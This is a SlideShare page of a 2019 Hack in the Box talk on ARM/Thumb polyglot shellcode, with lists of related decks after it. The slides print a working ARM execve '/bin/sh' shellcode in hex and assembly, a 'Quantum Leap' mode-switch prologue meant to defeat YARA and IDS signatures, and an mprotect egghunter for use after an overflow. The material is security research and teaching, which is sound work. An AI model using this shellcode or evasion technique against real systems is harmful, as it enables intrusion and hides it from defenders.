SlideShare ist ein Scribd-Unternehmen logo

ARM Polyglot Shellcode - HITB2019AMS

Saumil Shah
Saumil Shah

My talk on creating ARM/Thumb Polyglot shellcode for obfuscation, signature evasion and downright novelty of approach! Presented at Hack in the Box Amsterdam 2019

Internet
1 von 33
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Make ARM Shellcode Great Again Saumil Shah @therealsaumil #HITB2019AMS 9 May, Amsterdam
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Agenda • A background on ARM shellcode • My research around ARM shellcode – polyglot tricks - ARM Quantum Leap shellcode • Demos • Extra – space limitations - ARM mprotect Egghunter
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode exec command "/bin/sh" 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5a68732f .word 0x5868732f
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM Mode • 4 byte (32 bits) width • Can use ALL registers in operands (r0-r10) • Conditional Execution • Efficient code THUMB Mode • 2 byte (16 bits) width • Can use LIMITED registers in operands (r0-r7 only) • No Conditional Execution • Compact code • Released with ARM7TDMI
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Some Concerns / Arguments • "I can signature this" - YARA, IDS, … • Thumb-only processor? e.g: STM32 One Shellcode To Run Them All ! ! 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM/THUMB Encoding: mov r1, #7 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 32 bit ARM instruction 16 bit Thumb instruction
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Schrödinger's Instruction Set SAME SAME DIFFERENT BUT ARM THUMB
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Opening the Box N Z C V Q J GE E A I F T M Negative Zero Carry oVerflow underflow Jazelle SIMD Endianness Abortdisable IRQdisable FIQdisable Thumb privilege mode
NETSQUARE (c) SAUMIL SHAH#HITB2019AMSQUANTUM LEAP SHELLCODE
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB mode PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS "Quantum Leap" - what we need • An deeper understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. – Illegal instructions. • Also work on ARMv6 (no Thumb2) 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE (T = 0) "THUMB VIEW" (T = 1)
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand Have to tweak conditional bits
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conditional Instructions • How do we change the conditional bits? • Eh… what ARE "conditional bits?" ! • Every ARM instruction can be made CONDITIONAL. • addne triggers ONLY if a "not equals" condition exists (zero flag = 1) add r1, pc, #1 addne r1, pc, #1 ADD ADD IF NOT EQUALS
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conditional Suffixes EQ Equal To Z == 1 NE Not Equal To Z == 0 GT Greater Than (signed) Z == 0 && N == V GE Greater Than or Equal To (signed) N == V LT Less Than (signed) N != V LE Less Than or Equal To (signed) Z == 1 || N != V HI Higher (unsigned) C == 1 && Z == 0 LS Lesser (unsigned) C == 0 || Z == 1 CS Carry Set C == 1 CC Carry Clear C == 0 MI Minus / Negative N == 1 PL Plus / Positive N == 0 VS Overflow Set V == 1 VC Overflow Clear V == 0
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS! • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Assembling the Quantum Leap • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb. • No Thumb2 instructions. • No NULL bytes.
NETSQUARE (c) SAUMIL SHAH#HITB2019AMSDEMO QUANTUM LEAP SHELLCODE
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS ARM Egghunter EXTRAS
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS heap stack Lib Lib Binary overflow pointer ROP shellcode shellcode shellcode Shellcode in tight spaces • What if payload exceeds size "constraints"? – Overwrite local variables. – Bottom of the stack. • Many solutions. SEGFAULT! SEGFAULT!
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the EGG. • Nothing new here - done before.
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP egghunter RWX - by ROP chain Search for HACK+HACK one page at a time. gef> vmmap Start End Perm Path 0x00008000 0x00009000 rw- /home/pi/eggbreak 0x00010000 0x00011000 rw- /home/pi/eggbreak 0x00011000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] memory page not executable shellcode shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Egghunter - DEP • If EGG+shellcode is in a different memory region, then it may not be executable – Overflow in the stack – Shellcode in the heap • Enter the mprotect egghunter!
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] shellcode shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS mprotect Egghunter DEMO
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS Conclusion • ARM/Thumb Polyglot instructions offer many opportunities for OBFUSCATION and SIGNATURE bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
NETSQUARE (c) SAUMIL SHAH#HITB2019AMS exit(0) Saumil Shah @therealsaumil #HITB2019AMS 9 May, Amsterdam

Empfohlen

One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Pci express modi
Pci express modiPci express modi
Pci express modiproma_goswami
 
Linux rt in financial markets
Linux rt in financial marketsLinux rt in financial markets
Linux rt in financial marketsAdrien Mahieux
 
Userspace networking
Userspace networkingUserspace networking
Userspace networkingStephen Hemminger
 
PCI Express Verification using Reference Modeling
PCI Express Verification using Reference ModelingPCI Express Verification using Reference Modeling
PCI Express Verification using Reference ModelingDVClub
 
Introduction to armv8 aarch64
Introduction to armv8 aarch64Introduction to armv8 aarch64
Introduction to armv8 aarch64Yi-Hsiu Hsu
 
In-Memory Evolution in Apache Spark
In-Memory Evolution in Apache SparkIn-Memory Evolution in Apache Spark
In-Memory Evolution in Apache SparkKazuaki Ishizaki
 
PCIe DL_layer_3.0.1 (1)
PCIe DL_layer_3.0.1 (1)PCIe DL_layer_3.0.1 (1)
PCIe DL_layer_3.0.1 (1)Rakeshkumar Sachdev
 

Empfohlen

One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Pci express modi
Pci express modiPci express modi
Pci express modiproma_goswami
 
Linux rt in financial markets
Linux rt in financial marketsLinux rt in financial markets
Linux rt in financial marketsAdrien Mahieux
 
Userspace networking
Userspace networkingUserspace networking
Userspace networkingStephen Hemminger
 
PCI Express Verification using Reference Modeling
PCI Express Verification using Reference ModelingPCI Express Verification using Reference Modeling
PCI Express Verification using Reference ModelingDVClub
 
Introduction to armv8 aarch64
Introduction to armv8 aarch64Introduction to armv8 aarch64
Introduction to armv8 aarch64Yi-Hsiu Hsu
 
In-Memory Evolution in Apache Spark
In-Memory Evolution in Apache SparkIn-Memory Evolution in Apache Spark
In-Memory Evolution in Apache SparkKazuaki Ishizaki
 
PCIe DL_layer_3.0.1 (1)
PCIe DL_layer_3.0.1 (1)PCIe DL_layer_3.0.1 (1)
PCIe DL_layer_3.0.1 (1)Rakeshkumar Sachdev
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)Odinot Stanislas
 
Handle Large Messages In Apache Kafka
Handle Large Messages In Apache KafkaHandle Large Messages In Apache Kafka
Handle Large Messages In Apache KafkaJiangjie Qin
 
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_FinalGopi Krishnamurthy
 
Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisPaul V. Novarese
 
Functional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor GraphicsFunctional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor GraphicseInfochips (An Arrow Company)
 
System Verilog Tutorial - VHDL
System Verilog Tutorial - VHDLSystem Verilog Tutorial - VHDL
System Verilog Tutorial - VHDLE2MATRIX
 
Under the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database ArchitectureUnder the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database ArchitectureScyllaDB
 
Lightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache CassandraLightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache CassandraScyllaDB
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardsonharryvanhaaren
 
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample ReportOSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample ReportHomeland Security Research Corp.
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machineAlexei Starovoitov
 
Understanding DPDK algorithmics
Understanding DPDK algorithmicsUnderstanding DPDK algorithmics
Understanding DPDK algorithmicsDenys Haryachyy
 
nftables - the evolution of Linux Firewall
nftables - the evolution of Linux Firewallnftables - the evolution of Linux Firewall
nftables - the evolution of Linux FirewallMarian Marinov
 
Verification Strategy for PCI-Express
Verification Strategy for PCI-ExpressVerification Strategy for PCI-Express
Verification Strategy for PCI-ExpressDVClub
 
eBPF/XDP
eBPF/XDP eBPF/XDP
eBPF/XDP Netronome
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]Mahmoud Hatem
 
eBPF Perf Tools 2019
eBPF Perf Tools 2019eBPF Perf Tools 2019
eBPF Perf Tools 2019Brendan Gregg
 
Optimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDsOptimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDsJavier González
 
Linux dma engine
Linux dma engineLinux dma engine
Linux dma enginepradeep_tewani
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great AgainSaumil Shah
 

Weitere ähnliche Inhalte

Was ist angesagt?

Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)Odinot Stanislas
 
Handle Large Messages In Apache Kafka
Handle Large Messages In Apache KafkaHandle Large Messages In Apache Kafka
Handle Large Messages In Apache KafkaJiangjie Qin
 
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_FinalGopi Krishnamurthy
 
Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisPaul V. Novarese
 
Functional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor GraphicsFunctional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor GraphicseInfochips (An Arrow Company)
 
System Verilog Tutorial - VHDL
System Verilog Tutorial - VHDLSystem Verilog Tutorial - VHDL
System Verilog Tutorial - VHDLE2MATRIX
 
Under the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database ArchitectureUnder the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database ArchitectureScyllaDB
 
Lightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache CassandraLightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache CassandraScyllaDB
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardsonharryvanhaaren
 
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample ReportOSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample ReportHomeland Security Research Corp.
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machineAlexei Starovoitov
 
Understanding DPDK algorithmics
Understanding DPDK algorithmicsUnderstanding DPDK algorithmics
Understanding DPDK algorithmicsDenys Haryachyy
 
nftables - the evolution of Linux Firewall
nftables - the evolution of Linux Firewallnftables - the evolution of Linux Firewall
nftables - the evolution of Linux FirewallMarian Marinov
 
Verification Strategy for PCI-Express
Verification Strategy for PCI-ExpressVerification Strategy for PCI-Express
Verification Strategy for PCI-ExpressDVClub
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]Mahmoud Hatem
 
eBPF Perf Tools 2019
eBPF Perf Tools 2019eBPF Perf Tools 2019
eBPF Perf Tools 2019Brendan Gregg
 
Optimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDsOptimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDsJavier González
 

Was ist angesagt? (20)

Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
Virtualizing the Network to enable a Software Defined Infrastructure (SDI)
 
Handle Large Messages In Apache Kafka
Handle Large Messages In Apache KafkaHandle Large Messages In Apache Kafka
Handle Large Messages In Apache Kafka
 
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
03_03_Implementing_PCIe_ATS_in_ARM-based_SoCs_Final
 
Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and Analysis
 
Functional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor GraphicsFunctional Coverage Development Tips - Mentor Graphics
Functional Coverage Development Tips - Mentor Graphics
 
System Verilog Tutorial - VHDL
System Verilog Tutorial - VHDLSystem Verilog Tutorial - VHDL
System Verilog Tutorial - VHDL
 
Under the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database ArchitectureUnder the Hood of a Shard-per-Core Database Architecture
Under the Hood of a Shard-per-Core Database Architecture
 
Lightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache CassandraLightweight Transactions in Scylla versus Apache Cassandra
Lightweight Transactions in Scylla versus Apache Cassandra
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
 
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample ReportOSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
OSINT (Open Source Intelligence) Market - 2017 2022 - Sample Report
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machine
 
Understanding DPDK algorithmics
Understanding DPDK algorithmicsUnderstanding DPDK algorithmics
Understanding DPDK algorithmics
 
nftables - the evolution of Linux Firewall
nftables - the evolution of Linux Firewallnftables - the evolution of Linux Firewall
nftables - the evolution of Linux Firewall
 
Verification Strategy for PCI-Express
Verification Strategy for PCI-ExpressVerification Strategy for PCI-Express
Verification Strategy for PCI-Express
 
eBPF/XDP
eBPF/XDP eBPF/XDP
eBPF/XDP
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]
 
eBPF Perf Tools 2019
eBPF Perf Tools 2019eBPF Perf Tools 2019
eBPF Perf Tools 2019
 
Optimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDsOptimizing RocksDB for Open-Channel SSDs
Optimizing RocksDB for Open-Channel SSDs
 
Linux dma engine
Linux dma engineLinux dma engine
Linux dma engine
 

Ähnlich wie ARM Polyglot Shellcode - HITB2019AMS

Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great AgainSaumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainSaumil Shah
 
Java on arm theory, applications, and workloads [dev5048]
Java on arm theory, applications, and workloads [dev5048]Java on arm theory, applications, and workloads [dev5048]
Java on arm theory, applications, and workloads [dev5048]Aleksei Voitylov
 
2 introduction to arm architecture
2 introduction to arm architecture2 introduction to arm architecture
2 introduction to arm architecturesatish1jisatishji
 
The ARM Architecture: ARM : ARM Architecture
The ARM Architecture: ARM : ARM ArchitectureThe ARM Architecture: ARM : ARM Architecture
The ARM Architecture: ARM : ARM Architecturesreea4
 
How to build a virtual machine
How to build a virtual machineHow to build a virtual machine
How to build a virtual machineTerence Parr
 
Data Acquisition
Data AcquisitionData Acquisition
Data Acquisitionazhar557
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Basics Of Embedded Systems
Basics Of Embedded SystemsBasics Of Embedded Systems
Basics Of Embedded Systemsarlabstech
 
Haskell Symposium 2010: An LLVM backend for GHC
Haskell Symposium 2010: An LLVM backend for GHCHaskell Symposium 2010: An LLVM backend for GHC
Haskell Symposium 2010: An LLVM backend for GHCdterei
 
ARM Architecture Instruction Set
ARM Architecture Instruction SetARM Architecture Instruction Set
ARM Architecture Instruction SetDwight Sabio
 

Ähnlich wie ARM Polyglot Shellcode - HITB2019AMS (20)

Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great Again
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
HackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great AgainHackLU 2018 Make ARM Shellcode Great Again
HackLU 2018 Make ARM Shellcode Great Again
 
Java on arm theory, applications, and workloads [dev5048]
Java on arm theory, applications, and workloads [dev5048]Java on arm theory, applications, and workloads [dev5048]
Java on arm theory, applications, and workloads [dev5048]
 
Arm architecture overview
Arm architecture overviewArm architecture overview
Arm architecture overview
 
2 introduction to arm architecture
2 introduction to arm architecture2 introduction to arm architecture
2 introduction to arm architecture
 
Arm
ArmArm
Arm
 
The ARM Architecture: ARM : ARM Architecture
The ARM Architecture: ARM : ARM ArchitectureThe ARM Architecture: ARM : ARM Architecture
The ARM Architecture: ARM : ARM Architecture
 
How to build a virtual machine
How to build a virtual machineHow to build a virtual machine
How to build a virtual machine
 
ARM.ppt
ARM.pptARM.ppt
ARM.ppt
 
Data Acquisition
Data AcquisitionData Acquisition
Data Acquisition
 
